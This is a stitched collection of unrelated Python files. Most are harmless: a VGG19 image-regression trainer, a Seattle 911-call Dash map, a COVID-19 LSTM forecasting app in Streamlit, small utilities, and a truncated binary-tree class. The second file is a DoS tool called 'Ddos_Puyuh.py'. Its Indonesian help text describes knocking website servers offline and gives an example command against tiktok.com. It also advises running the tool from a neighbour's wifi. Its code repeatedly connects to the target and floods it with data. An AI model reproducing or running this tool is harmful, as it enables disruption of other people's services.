data = floors.split(',')
if len(data) > 0:
for i in range(len(data)):
values.append(float(data[i].strip()))
floor_params[filename] = values
return floor_params
def build_model(int_shape, num_params, learning_rate):
model = tf.keras.Sequential([
tf.keras.applications.VGG19(input_shape=(WIDTH, HEIGHT, 3), include_top=False, weights='imagenet'),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.001)),
tf.keras.layers.Dropout(0.5),
tf.keras.layers.Dense(512, activation='relu', kernel_regularizer=tf.keras.regularizers.l2(0.001)),
tf.keras.layers.Dropout(0.5),
tf.keras.layers.Dense(num_params),
])
optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
model.compile(
loss='mse',
optimizer=optimizer,
metrics=['mae', 'mse'])
return model
def train(input_dir, model_dir, num_epochs, learning_late, augmentation_factor, output_dir, debug):
# Load parameters
ground_params = load_annotation("column_annotation.txt")
floor_params = load_annotation_floor("floor_annotation.txt")
# Split the tensor into train and test dataset
path_list = glob.glob("{}/*.jpg".format(input_dir))
X, Y = load_imgs(path_list, ground_params, floor_params, use_augmentation = True, augmentation_factor = augmentation_factor, use_shuffle = True, debug = debug)
#print(X.shape)
if debug: return
# Build model
model = build_model((HEIGHT, WIDTH, NUM_CHANNELS), NUM_CLASSES, learning_late)
# Setup for Tensorboard
log_dir="logs\\fit\\" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
file_writer = tf.summary.create_file_writer(log_dir + "\\metrics")
file_writer.set_as_default()
tensorboard_callback = TensorBoard(
log_dir=log_dir,
update_freq='batch',
histogram_freq=1)
# Training model
model.fit(X, Y,
epochs=num_epochs,
validation_split = 0.2,
callbacks=[tensorboard_callback])
# Save the model
model.save("{}/{}".format(model_dir, MODEL_FILE_NAME))
def test(input_dir, model_dir, output_dir, debug):
# Load parameters
ground_params = load_annotation("column_annotation.txt")
floor_params = load_annotation_floor("floor_annotation.txt")
# Split the tensor into train and test dataset
path_list = glob.glob("{}/*.jpg".format(input_dir))
X, Y = load_imgs(path_list, ground_params, floor_params, debug = debug)
if debug: return
# Load the model
model = tf.keras.models.load_model("{}/{}".format(model_dir, MODEL_FILE_NAME))
# Evaluation
model.evaluate(X, Y)
# Prediction
predictedY = model.predict(X).flatten()
# Write the prediction to a file
file = open("{}/prediction.txt".format(output_dir), "w")
for i in range(len(path_list)):
file_name = os.path.basename(path_list[i])
file.write("{},{}\n".format(file_name, predictedY[i]))
file.close()
# Save the predicted images
accuracy = 0
accuracy2 = 0
for i in range(len(path_list)):
file_name = os.path.basename(path_list[i])
print(path_list[i])
orig_img = load_img(path_list[i])
orig_height, orig_width, channels = orig_img.shape
# Crop sky and shop
floors = sorted(floor_params[file_name])
shop = int(floors[len(floors) - 1] * orig_height)
orig_img = orig_img[shop:orig_height,:,:]
orig_height, orig_width, channels = orig_img.shape
img = cv2.resize(orig_img, dsize=(WIDTH, HEIGHT), interpolation=cv2.INTER_CUBIC)
width = orig_width
Y = []
# Prediction
X = numpy.zeros((1, WIDTH, HEIGHT, 3), dtype=float)
X[0,:,:,:] = standardize_img(img)
valueR = model.predict(X).flatten()[0]
R = valueR * width
valueR = numpy.clip(valueR * width / orig_width, a_min = 0, a_max = 1)
valueL = model.predict(X).flatten()[1]
L = valueL * width
valueL = numpy.clip(valueL * width / orig_width, a_min = 0, a_max = 1)
if valueL < 0.05: break
Y.append(valueR)
Y.append(valueL)
w = 0;
correct = 0;
w2 = 0;
correct2 = 0;
R_truth = ground_params[file_name][1] * width
L_truth = ground_params[file_name][0] * width
correct3 = 0
correct4 = 0
for j in range(width):
if (j < L or j > R):
w += 1;
if (j < L_truth or j > R_truth):
correct += 1
else:
w2 += 1;
if (j > L_truth and j < R_truth):
correct2 += 1
if (j < L_truth or j > R_truth):
correct3 += 1
if (j > L_truth and j < R_truth):
correct4 += 1
#print((1 - floors[len(floors) - 1]) * correct3 / width)
#print((1 - floors[len(floors) - 1]) * correct4 / width)
accuracy += (correct / w)
if (w2 != 0):
accuracy2 += (correct2 / w2)
# Save prediction image
file_name = "{}/{}".format(output_dir, os.path.basename(path_list[i]))
output_img2(Image.open(path_list[i]), Y, file_name)
#print(accuracy / len(path_list))
#print(accuracy2 / len(path_list))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--mode', required=True, choices=["train", "test"])
parser.add_argument('--input_dir', required=True, help="path to folder containing images")
parser.add_argument('--output_dir', default="out", help="where to put output files")
parser.add_argument('--model_dir', default="models", help="path to folder containing models")
parser.add_argument('--num_epochs', type=int, default=10)
parser.add_argument('--learning_rate', type=float, default=0.0001)
parser.add_argument('--augmentation_factor', type=int, default=100)
parser.add_argument('--debug', action="store_true", help="Output debug information")
args = parser.parse_args()
# Create output directory
if not os.path.isdir(args.output_dir):
os.mkdir(args.output_dir)
# Create model directory
if not os.path.isdir(args.model_dir):
os.mkdir(args.model_dir)
# Create debug directory
if args.debug:
if not os.path.isdir(DEBUG_DIR):
os.mkdir(DEBUG_DIR)
else:
files = glob.glob("{}/*".format(DEBUG_DIR))
for f in files:
os.remove(f)
if args.mode == "train":
train(args.input_dir, args.model_dir, args.num_epochs, args.learning_rate, args.augmentation_factor, args.output_dir, args.debug)
elif args.mode == "test":
test(args.input_dir, args.model_dir, args.output_dir, args.debug)
else:
print("Invalid mode is specified {}".format(args.mode))
exit(1)
if __name__== "__main__":
main()
|
import socket
import time
import sys
import os
import random
import string
import optparse
import requests
def help():
os.system("clear")
print("""
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mCoding Tools By \033[1;91m: \033[1;93mRendi Noober
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mGithub \033[1;91m : \033[1;93mhttps://github.com/Rendi-ID
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mFacebook\033[1;91m :\033[1;93m Rendi Saputra
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mYouTube\033[1;91m : \033[1;93mRendi Noober
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mJenis Tools \033[1;91m :\033[1;93m Attack
\033[1;90m[\033[1;95m•\033[1;90m] \033[1;96mWhastApp\033[1;91m :\033[1;93m +62 899-8941-414
\033[1;93mNOTE\033[1;90m: \033[1;92mPembuat tools ini tidak akan bertanggung jawab atas apa
yang di lakukan oleh si pengguna baik itu sengaja maupun
tidak sengaja!!!
\033[1;96mSARAN\033[1;90m:
\033[1;93m KUOTA\033[1;90m:
\033[1;95m Jika anda menggunakan tools ini dengan kuota/peket data
saya sarankan untuk mempunyai kuota yg banyak (KALAU)
anda menggunakan tools ini secara lama
\033[1;93m WIFI\033[1;90m:
\033[1;95m Kalau anda menggunakan akses wifi saya sarankan untuk
memakai wifi tetangga atau wifi berbayar(3000)
di karenakan serangan Dos/DDos itu mengirim paket
dengan data yg banyak, maka dari itu kuota juga terkuras
\t\033[1;90m< \033[1;91mKETERANGAN TENTANG TOOLS INI \033[1;90m>
\033[1;92mTools ini di buat untuk pembelajaran, untuk membuat anda
mengerti dan paham bagaana cara melakukan Dos/DDos ke sebuah
website server
\t\033[1;90m<\033[1;91m FUNGSI \033[1;90m>
\033[1;92mUntuk melakukan serangan Dos/DDos ke sebuah website server
untuk melumpuhkan website dengan Cara mengirim data secara
berlebihan berbasis GB
\t\033[1;90m<\033[1;91m CARA MEMAKAI \033[1;90m>
\033[1;95mKetik di termux\033[1;90m:
\033[1;96mpython3 Ddos_Puyuh.py -t (link web) -p (port untuk koneksikan ke web) -m (jam serangan di mulai) -s (jam serangan selesai)
\033[1;92mcontoh\033[1;90m:
\033[1;96mpython3 Ddos_Puyuh.py -t https://tiktok.com -p 80 -m 23 -s 24 --message We are legion
\033[1;93m-t\033[1;90m =\033[1;92m Untuk meng-koneksikan ke website server yang di tuju
\033[1;93m-p\033[1;90m =\033[1;92m untuk meng-koneksikan port ke website target
\033[1;93m-m \033[1;90m=\033[1;92m jam serangan di mulai (sesuaikan dengan perangkat anda)
\033[1;93m-s\033[1;90m =\033[1;92m jam serangan di hentikan (sesuaikan dengan perangkat anda)
\033[1;95mok selamat mencoba \033[1;91m:\033[1;90m)
""")
if len(sys.argv) == 1:
help()
exit()
try:
run = requests.post("https://google.com")
opt = optparse.OptionParser(add_help_option=False)
opt.add_option("-t", dest="host")
opt.add_option("-p", dest="port")
opt.add_option("-m", dest="mulai")
opt.add_option("-s", dest="selesai")
opt.add_option("--message", dest="msg")
opts, args = opt.parse_args()
host = opts.host
port = opts.port
mulai = opts.mulai
selesai = opts.selesai
if opts.msg is None:
message = string.punctuation + string.digits + string.ascii_letters + string.ascii_lowercase + string.ascii_uppercase
msg = "".join(random.sample(message, 10))
elif opts.msg is not None:
msg = opts.msg
else:
pass
host = str(host).replace("https://", "").replace("http://", "").replace("www.", "")
try:
ip = socket.gethostbyname(host)
except socket.gaierror as e:
print("\033[1;90m[\033[1;96m!\033[1;90m]\033[1;91m Pastikan anda memasukan website yang benar!!")
exit()
# Time Bomb
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
waktu = time.strftime("%H")
if str(waktu) == str(mulai):
try:
print("\033[1;96mMengirim Paket Ke\033[1;91m " + host + "\033[1;92m Port\033[1;91m " + port + " \033[1;95mmulai\033[1;91m " + mulai + "\033[1;94m selesai \033[1;91m " + selesai)
sock.connect((str(ip), int(port)))
if port == 80:
sock.send("GET / \nHTTP /1.1\n User-Agent: {}\n\r".format("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36").encode())
sock.send(str(msg).encode("utf-8"))
except:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
elif str(waktu) == str(selesai):
print("\n\033[1;90m[\033[1;95m!\033[1;90m] \033[1;91mWaktu selesai, menutup serangan!!!")
time.sleep(1.0)
sock.close()
break
except requests.exceptions.ConnectionError:
print("\033[1;90m[\033[1;95m!\033[1;90m]\033[1;91m Cek koneksi")
exit()
|
# -*- coding: utf-8 -*-
# importing required packages
import logging
# import scrapy packages
import scrapy
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
# importing scrapy spiders
from spiders.crawler_v1 import crawler_v1
# main function
def main():
'''
description of overall scrapy program
'''
# configuring log settings
logging.basicConfig(filename="main.log", filemode = "w", format="%(asctime)s%(levelname)s:%(message)s", level=logging.DEBUG)
# import project settings
process = CrawlerProcess(get_project_settings())
# running first crawler
process.crawl(crawler_v1)
process.start()
logging.info("crawler_v1 finished crawling")
process.stop()
if __name__=='__main__':
main()
|
# encoding: utf-8
'''
@author: 程哲
@contact: 909991719@qq.com
@file: arduino通信.py
@time: 2017/9/28 10:55
'''
import serial
ser=serial.Serial("com8",9600)
ser.timeout=1
print(ser.readline())
ser.write(b'11111\n')
print(ser.readline().decode("ascii"))
ser.close() |
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import pandas as pd
import plotly.express as px
import numpy as np
"""
This section import the csv 911 calls.
Year, Month, Zone columns are created.
Four most important types are filtered.
"""
file1 = "Seattle_Real_Time_Fire_911_Calls.csv"
data = pd.read_csv(file1, nrows=100000) # nrows is the data number
# Add "Year" and "Mpnth" columns
data['Year'] = pd.DatetimeIndex(data['Datetime']).year
year2019 = data['Year'] == 2019
#data=data[year2019] # in this demo only 2019 data are selected
data['Month'] = pd.DatetimeIndex(data['Datetime']).month
available_indicators = data['Year'].unique()
# Seattle center
lat_mean = 47.608013
lon_mean = -122.335167
# Add Zone column
conditions = [
(data['Longitude'] >= lon_mean) & (data['Latitude'] >= lat_mean),
(data['Longitude'] < lon_mean) & (data['Latitude'] >= lat_mean),
(data['Longitude'] >= lon_mean) & (data['Latitude'] < lat_mean),
(data['Longitude'] < lon_mean) & (data['Latitude'] < lat_mean)]
choices = ['NE', 'NW', 'SE', 'SW']
data['Zone'] = np.select(conditions, choices)
# Select Type
medic = (data['Type'] == "Medic Response")
aid = data['Type'] == "Aid Response"
car = data['Type'] == "MVI - Motor Vehicle Incident"
fire = data['Type'] == "Auto Fire Alarm"
df=data[(medic | aid | fire | car)]
# filter out 0 zone values
df = df[(df['Zone'] == 'NE')|(df['Zone'] == 'NW')|(df['Zone'] == 'SE')|(df['Zone'] == 'SW')]
"""
Interactive map section
Define the layout and callback functions
"""
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div([
dcc.Graph(id='map-graph'),
html.Label('Year'),
dcc.Dropdown(
id='year-option',
options=[{'label': i, 'value': i} for i in available_indicators],
value=2019
),
html.Label('Month'),
dcc.Slider(
id = 'month-slider',
min = df['Month'].min(),
max = df['Month'].max(),
value = df['Month'].min(),
marks = {str(Month): str(Month) for Month in df['Month'].unique()},
step=None),
html.Label('Zone'),
dcc.RadioItems(
id = 'zone-option',
options=[
{'label': 'NE', 'value': 'NE'},
{'label': 'NW', 'value': 'NW'},
{'label': 'SE', 'value': 'SE'},
{'label': 'SW', 'value': 'SW'}
],
value='NE'
),
html.Label('Call Type'),
dcc.RadioItems(
id = 'type-option',
options=[
{'label': 'Medic Response', 'value': 'Medic Response'},
{'label': 'MVI - Motor Vehicle Incident', 'value': 'MVI - Motor Vehicle Incident'},
{'label': 'Auto Fire Alarm', 'value': 'Auto Fire Alarm'},
{'label': 'Aid Response', 'value': 'Aid Response'}
],
value='Medic Response'
),
html.Div([
dcc.Graph(
id='statistics',
)
], style={'width': '49%', 'display': 'inline-block'}),
],style={'columnCount': 2})
layout_map = dict(
autosize=True,
height=1000,
font=dict(color="#191A1A"),
titlefont=dict(color="#191A1A", size='14'),
margin=dict(
l=35,
r=35,
b=35,
t=45
),
hovermode="closest",
plot_bgcolor='#fffcfc',
paper_bgcolor='#fffcfc',
legend=dict(font=dict(size=10), orientation='h'),
title='911 Calls in Seattle',
mapbox=dict(
style = "open-street-map",
center=dict(
lon=-122.3,
lat=47.5
),
zoom=10,
)
)
# functions
def gen_map(map_data):
# groupby returns a dictionary mapping the values of the first field
# 'classification' onto a list of record dictionaries with that
# classification value.
return {
"data": [{
"type": "scattermapbox",
"lat": list(map_data['Latitude']),
"lon": list(map_data['Longitude']),
"mode": "markers",
"name": list(map_data['Zone']),
"marker": {
"size": 6,
"opacity": 0.7
}
}],
"layout": layout_map
}
@app.callback(
Output('map-graph', 'figure'),
[Input('year-option', 'value'),
Input('type-option', 'value'),
Input('zone-option', 'value'),
Input('month-slider', 'value')])
def update_figure(year,selected_type,selected_zone,month_value):
filtered_df = df[(df.Type == selected_type) & (df.Month == month_value) & (df.Year == year) & (df.Zone == selected_zone)]
return gen_map(filtered_df)
@app.callback(
Output('statistics', 'figure'),
[Input('year-option', 'value'),
Input('type-option', 'value'),
Input('month-slider', 'value')])
def update_graph(year,selected_type,month_value):
dff = df[(df.Type == selected_type) & (df.Month == month_value) & (df.Year == year)]
df_st = dff.Zone.value_counts()
df_st = df_st.reset_index()
return {
'data': [dict(
x=df_st['index'],
y=df_st['Zone'],
type = 'bar'
)],
'layout': dict(
xaxis={
'title': 'Zone'
},
yaxis={
'title': 'Counts'
},
hovermode='closest'
)
}
if __name__ == '__main__':
app.run_server(debug=True)
|
import sys
sys.path.append("../..")
from gowalla_research.random_walk.random_walk import doRandomWalkPickle2Pickle
from gowalla_research.core.user import User
from gowalla_research.core.connection import Edge
for i in range(10):
doRandomWalkPickle2Pickle("nodes_data_dictionary.pkl", "full_random/NODES" + str(i+1) + "000.pkl",(i+1)*1000)
|
"""
Created on Mon Mar 8 15:11:51 2021
Baseado nos treinamentos realizados por:
covid_lstm_dev_n02
@author: lmmastella
"""
# %% Import libraries
import numpy as np
import pandas as pd
import streamlit as st
from PIL import Image
import plotly.graph_objs as go
from plotly.subplots import make_subplots
from sklearn.preprocessing import MinMaxScaler
from tensorflow.keras.models import load_model
from datetime import datetime, timedelta
import os
# %% Prepara os dados em time step para a LSTM(timesteps)
def create_dataset(data, ts=1):
"""
Parameters
----------
data : DataFrame
shape(n, 1)
ts : int
timesteps
Returns
-------
array x - predict
array y - features
"""
x, y = [], []
for i in range(ts, len(data)):
x.append(data[i-ts:i, 0])
y.append(data[i, 0])
return np.array(x), np.array(y)
# %% Predict
def create_predict(data, pred_datas):
"""
Parameters
----------
data : array
shape(n, 1)
pred_datas : int
number previsions
Returns
-------
previsions (array) - predict features
"""
previsions = []
for i in range(pred_datas):
x_input = data.reshape(1, n_steps, n_features)
prevision = model.predict(x_input)
previsions.append(prevision[0, 0])
data = np.delete(data, 0, axis=0)
data = np.vstack([data, prevision])
return np.array(previsions)
# %% Define o tipo de análise - Casos ou Mortes
def define_dataset(tipo):
"""
Parameters
----------
tipo: str
Casos ou Obitos
Returns
-------
df (db) cor1 e cor2 para os gráficos
"""
if tipo == 'Obitos':
df = df_obitos
cor1 = 'blue'
cor2 = 'red'
else:
df = df_casos
cor1 = 'blue'
cor2 = 'royalblue'
return (df, cor1, cor2)
# %% Acertar a seleção com a base de dados
def get_tipo_local(local_tipo):
"""
Retorna os valores de Região, Estado e Município em lower case
para adapatacao ao banco de dados.
Retorna a lista conforme a situacao Região, Estado e Município
Parameters
----------
local_tipo: str
Região, Estado e Município
Returns
-------
regiao, estado e municipio em lower case conforme dataset e lista_local
"""
if local_tipo == 'Região':
lista = sorted(df_brasil_ori['regiao'].unique().tolist())
return 'regiao', lista
elif local_tipo == 'Estado':
lista = sorted(df_brasil_ori['estado'].unique().tolist())
return 'estado', lista
elif local_tipo == 'Município':
lista = sorted(df_brasil_ori['municipio'].unique().tolist())
return 'municipio', lista
else:
'None'
# %% Importa Dataset e prepara base de dados para análise
# arquivo original baixado de https://covid.saude.gov.br
@st.cache
def load_data():
df1 = pd.read_csv("/Users/lmmastella/dev/covid/HIST_PAINEL_COVIDBR1.csv", sep=";")
df2 = pd.read_csv("/Users/lmmastella/dev/covid/HIST_PAINEL_COVIDBR2.csv", sep=";")
df_ori = pd.concat([df1, df2])
# df_ori = pd.read_csv(
# "/Users/lmmastella/dev/covid/HIST_PAINEL_COVIDBR.csv", sep=";")
# limpar os campos sem dados
df_ori = df_ori.replace(np.nan, '', regex=True)
# arquivo original : df_brasil_ori
return df_ori
df_brasil_ori = load_data()
# %% Streamlit Capa
st.title('COVID-19 Análise')
st.write("""
# Análise da evolução da COVID no Brasil
**1.Visualizar** gráficos do Brasil, Estados e Municípios
""")
# image
image = Image.open("/Users/lmmastella/dev/web/Covid.jpeg")
st.image(image, use_column_width=True)
# %% Streamlit menu lateral - Variáveis para tratar arquivos
# tipo - Casos ou Obitos
# tipo_local - regiao, estado ou municipio
# local - Brasil, RS, Porto Alegre etc.
st.sidebar.header("Escolha o tipo e local de análise")
lista_tipo = ('Casos', 'Obitos')
tipo = st.sidebar.selectbox('Selecione o tipo de análise', lista_tipo)
lista_local_tipo = ('Região', 'Estado', 'Município')
local_tipo = st.sidebar.selectbox(
'Selecione o tipo de local', lista_local_tipo)
tipo_local, lista_local = get_tipo_local(local_tipo)
local = st.sidebar.selectbox('Selecione o local desejado', lista_local)
day = datetime.today().strftime("%Y-%m-%d") # dia do relatório (str)
st.sidebar.text_input('Data Atual: ', day)
st.sidebar.text_input('Data do Arquivo: ', df_brasil_ori['data'].iloc[-1])
# %% Preparar Dataset para seleção conforme as variáveis acima
# seleção
if tipo_local == 'municipio':
df_brasil = df_brasil_ori[df_brasil_ori[tipo_local] != '']
elif tipo_local == 'estado':
df_brasil = df_brasil_ori[(df_brasil_ori[tipo_local] != '')
& (df_brasil_ori['codmun'] == '')]
# problema dataset
elif tipo_local == 'regiao':
df_brasil = df_brasil_ori[(df_brasil_ori[tipo_local] != '')
& (df_brasil_ori['codmun'] == '')]
# problema dataset
# arquivo selecionado : df_brasil
# limpeza do arquivo com eliminação de colunas desnecessárias datas duplicadas
df_brasil = df_brasil.drop(columns=['coduf', 'codmun',
'codRegiaoSaude', 'nomeRegiaoSaude',
'semanaEpi', 'populacaoTCU2019',
'Recuperadosnovos', 'emAcompanhamentoNovos',
'interior/metropolitana'])
# seleção
df_brasil = df_brasil[df_brasil[tipo_local] == local]
# preparar dataset = eliminando datas duplicada
df_brasil = df_brasil.drop_duplicates(['data'])
# %% ERRO NOS DADOS
mask = (df_brasil['casosNovos'] > 120000) | (df_brasil['casosNovos'] < -120000)
df_brasil = df_brasil.loc[~mask]
# %% Gráfico de casos reais do local selecionado
fig = go.Figure()
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
go.Scatter(
x=df_brasil['data'],
y=df_brasil['casosAcumulado'],
mode='lines+markers',
name='Casos Total',
line_color='blue'),
secondary_y=True
)
fig.add_trace(
go.Bar(x=df_brasil['data'],
y=df_brasil['casosNovos'],
name='Casos Diarios',
marker_color='blue'),
secondary_y=False
)
fig.add_trace(
go.Scatter(x=df_brasil['data'],
y=round(df_brasil['casosNovos'].rolling(7).mean()),
name=' MM7',
marker_color='black'),
secondary_y=False
)
# Criando Layout
fig.update_layout(title_text=local + ' - Evolução de Casos',
legend=dict(x=0.02, y=0.95),
legend_orientation="v",
hovermode='x unified')
# X axis
fig.update_xaxes(title_text="Datas")
# Y axis
fig.update_yaxes(title_text="Casos Total", secondary_y=True)
fig.update_yaxes(title_text="Casos Diarios", secondary_y=False)
st.plotly_chart(fig)
# %% Gráfico de óbitos reais do local selecionado
fig = go.Figure()
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
go.Scatter(
x=df_brasil['data'],
y=df_brasil['obitosAcumulado'],
mode='lines+markers',
name='Óbitos Total',
line_color='red'),
secondary_y=True
)
fig.add_trace(
go.Bar(x=df_brasil['data'],
y=df_brasil['obitosNovos'],
name='Óbitos Diarios',
marker_color='red'),
secondary_y=False
)
fig.add_trace(
go.Scatter(x=df_brasil['data'],
y=round(df_brasil['obitosNovos'].rolling(7).mean()),
name=' MM7',
marker_color='black'),
secondary_y=False
)
# Criando Layout
fig.update_layout(title_text=local + ' - Evolução de Óbitos',
legend=dict(x=0.02, y=0.95),
legend_orientation="v",
hovermode='x unified')
# X axis
fig.update_xaxes(title_text="Datas")
# Y axis
fig.update_yaxes(title_text="Óbitos Total", secondary_y=True)
fig.update_yaxes(title_text="Óbitos Diarios", secondary_y=False)
st.plotly_chart(fig)
# %% Variáveis para database de treinamento
st.write(
"""
**2.Visualizar** gráficos de tendência do Brasil, Estados e Municípios.
Algoritmo de predição LSTM (biblioteca Tensorflow)
""")
if st.checkbox('Predições para os dias selecionados'):
pred_days = st.slider('Selecione o número de dias para análise', 1, 30, 10)
n_steps = 10 # amostras para LSTM
n_features = 1 # target - y
else:
st.stop()
# %% Treinar modelo se ainda não foi treinado(não tem o arquivo com o nome)
arq = 'Covid_lstm_' + tipo + '_' + local + '_v_02.h5'
if(not os.path.exists(arq)):
st.write(
" Local sem dados de treinamento, favor solicitar inclusão na base de dados")
st.stop()
model = load_model(arq)
# %% funcao que define qual o daset dependendo do tipo (Casos ou Obitos)
df_casos = df_brasil[['data', 'casosNovos']].set_index('data')
df_obitos = df_brasil[['data', 'obitosNovos']].set_index('data')
df, cor1, cor2 = define_dataset(tipo)
df.columns = [tipo]
# %% Preparar a base de dados de treinamento entre 0 e 1
df_scaler = df.values
scaler = MinMaxScaler(feature_range=(0, 1))
df_scaler = scaler.fit_transform(df_scaler)
# %% Gerar o dataset para treinamento com a função create_dataset
data_x, data_y = create_dataset(df_scaler, n_steps)
# %% Reshape features for LSTM Layer [samples, time steps, features]
data_x = np.reshape(data_x, (data_x.shape[0], data_x.shape[1], 1))
# %% Predict actual - o mesmo do treinamento
predictions = model.predict(data_x)
predictions = scaler.inverse_transform(predictions)
predictions = np.around(predictions).astype(int)
# %% Next days - ultimos n_steps do arquivo inicial shape (n_steps, 1)
df_p = df[-n_steps:].values # ultimos valores (n_steps)
df_p = scaler.transform(df_p) # prepara para o lstm
# faz a predição conformr o numero de dias (pred_days) e a função create_predict
predictions_p = create_predict(df_p, pred_days) # previsoes
# retorna as valores nornais do dataset
predictions_p = scaler.inverse_transform(predictions_p.reshape(-1, 1))
predictions_p = np.around(predictions_p).astype(int)
# %% Acerto das datas (df_index) object data tipo 2020-02-22 aaaa-mm-dd
# dataset original
index_days = [datetime.strptime(d, '%Y-%m-%d')
for d in df.index[n_steps:]]
# predictions (pred_days
next_days = [index_days[-1] + timedelta(days=i) for i in range(1, pred_days+1)]
# total
total_days = index_days + next_days
# %% Banco de dados de predicao
CasosDiasPre = pd.Series(np.concatenate(
(predictions, predictions_p))[:, 0]) # Total
CasosDias = pd.Series(df[n_steps:].values[:, 0].astype(int))
CasosPre = pd.Series(CasosDiasPre).cumsum()
CasosReais = pd.Series(CasosDias).cumsum()
CasosMM7 = round(CasosDias.rolling(7).mean(), 2)
predict = pd.DataFrame([total_days,
list(CasosPre),
list(CasosReais),
list(CasosDiasPre),
list(CasosDias),
list(CasosMM7)],
["Data", "CasosPre", "CasosReais",
"CasosDiasPre", "CasosDias",
"CasosMM7"]).\
transpose().set_index("Data")
# %% Gráfico de casos ou mortes reais e previstos do local selecionado
fig = go.Figure()
fig = make_subplots(specs=[[{"secondary_y": True}]])
fig.add_trace(
go.Scatter(
x=predict.index,
y=predict['CasosPre'],
mode='lines+markers',
name=tipo + ' Previstos',
line_color='crimson'),
secondary_y=True
)
fig.add_trace(
go.Scatter(
x=predict.index,
y=predict['CasosReais'],
mode='lines+markers',
name=tipo + ' Reais',
line_color=cor1),
secondary_y=True
)
fig.add_trace(
go.Bar(x=predict.index,
y=predict['CasosDiasPre'],
name='Diario Previsto',
marker_color='tan'),
secondary_y=False
)
fig.add_trace(
go.Bar(x=predict.index,
y=predict['CasosDias'],
name='Diario Real',
marker_color=cor2),
secondary_y=False
)
fig.add_trace(
go.Scatter(x=predict.index,
y=predict['CasosMM7'],
name=tipo + ' MM7',
marker_color='black'),
secondary_y=False
)
# Criando Layout
fig.update_layout(title_text=local + ' Previsão e Evolução de ' + tipo,
legend=dict(x=0.02, y=0.95),
legend_orientation="v",
hovermode='x unified')
# X axis
fig.update_xaxes(title_text="Datas")
# Y axis
fig.update_yaxes(title_text=tipo + " Total", secondary_y=True)
fig.update_yaxes(title_text=tipo + " Diarios", secondary_y=False)
st.plotly_chart(fig)
# %% Visualisar o dataset
if st.checkbox('Verificar o dataset comparativo'):
st.dataframe(predict.style.highlight_max(axis=0).set_precision(2))
# st.table(predict.style.set_precision(2))
else:
st.stop()
# %% TESTE TODO |
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 23:50:30 2018
@author: Rathin
"""
#This code implements the distortion filter
#It modulates the amplitude and then does the clipping using a given thresold
import pandas as pd
data = pd.read_csv('rathinfinal300500.dat', sep='\s+', header=None, skiprows=2)# read file frmo second line
x=data[0] #read colmn 0
y=data[1] #read coumn 1
xlist=[] #creating empty list
ylist=[] #creating empty list
for i in range(0,int(len(x))):
xlist.append(float(x.iloc[i])) #adding value to xlist
ylist.append(float(y.iloc[i])) #adding value to ylist
print(len(ylist)) #printing length of the samples
f= open("rathinoutputfile.dat","w") #creating a rathinoutputfile.dat and opening in write mode
f.write("; Sample Rate "+ str(44100)+"\n") #adding header i.e. sample rate
f.write("; Channels 1 "+"\n") #adding header i.e. channels
counter=0 #counter used to check if any sample are less or missing
for i in range(0, int(len(xlist))): #for loop for filter and also for writing the data in file
ylist[i]=ylist[i]*2 #amplifying the audio
if ylist[i]>0.316: #clipping with thresold value -10db
ylist[i]=(0.316)
elif ylist[i]< (-0.316):
ylist[i]= (-0.316)
f.write(str(xlist[i])+" " + str((ylist[i])) +"\n") #writing the time and amplitude data in the file
counter=counter+1 #checking sample count
print (counter)
f.close() #closing the file opened for editing
|
from math import*
v0=float(input("velocidade inicial: "))
ang=float(input("angulo alfa: "))
d=float(input("distancia porco-passaro: "))
g=9.8
R=(v0**2)*(sin(2*radians(ang)))/g
if (abs(d-R)<0.1):
print("sim")
else:
print("nao")
|
import queue
class BTree:
def __init__(self, data):
self.data = data
self.left_child = None
self.right_child = None
def pre_order(self, root_node):
if not root_node:
return 'BT is not exist'
print(root_node.data)
self.pre_order(root_node.left_child)
self.pre_order(root_node.right_child)
def in_order(self, root_node):
if not root_node:
return 'BT is not exist'
self.pre_order(root_node.left_child)
print(root_node.data)
self.pre_order(root_node.right_child)
def post_order(self, root_node):
if not root_node:
return 'BT is not exist'
self.pre_order(root_node.left_child)
self.pre_order(root_node.right_child)
print(root_node.data)
def level_order(self, root_node):
if not root_node:
return 'BT is not exist'
else:
costom_queue = queue.Queue()
costom_queue.enqueue(root_node)
while not costom_queue.isEmpty():
root = costom_queue.dequeue()
print(root.value.data)
if root.value.left_child is not None:
costom_queue.enqueue(root.value.left_child)
if root.value.right_child is not None:
costom_queue.enqueue(root.value.right_child)
def search(self, root_node, node_value):
if not root_node:
return 'BT is not exist'
else:
costom_queue = queue.Queue()
costom_queue.enqueue(root_node)
while not costom_queue.isEmpty():
root = costom_queue.dequeue()
if root.value.data == node_value:
return node_value
if root.value.left_child is not None:
costom_queue.enqueue(root.value.left_child)
if root.value.right_child is not None:
costom_queue.enqueue(root.value.right_child)
return 'Not Found'
def insert(self, root_node, new_node_value):
new_node = BTree(new_node_value)
if not root_node:
root_node = new_node
else:
costom_queue = queue.Queue()
costom_queue.enqueue(root_node)
while not costom_queue.isEmpty():
root = costom_queue.dequeue()
if root.value.left_child is not None:
costom_queue.enqueue(root.value.left_child)
else:
root.value.left_child = new_node
return 'Inserted'
if root.value.right_child is not None:
costom_queue.enqueue(root.value.right_child)
else:
root.value.right_child = new_node
return 'Inserted'
def get_deepest_node(self, root_node):
if not root_node:
return 'BT is not exist'
else:
costom_queue = queue.Queue()
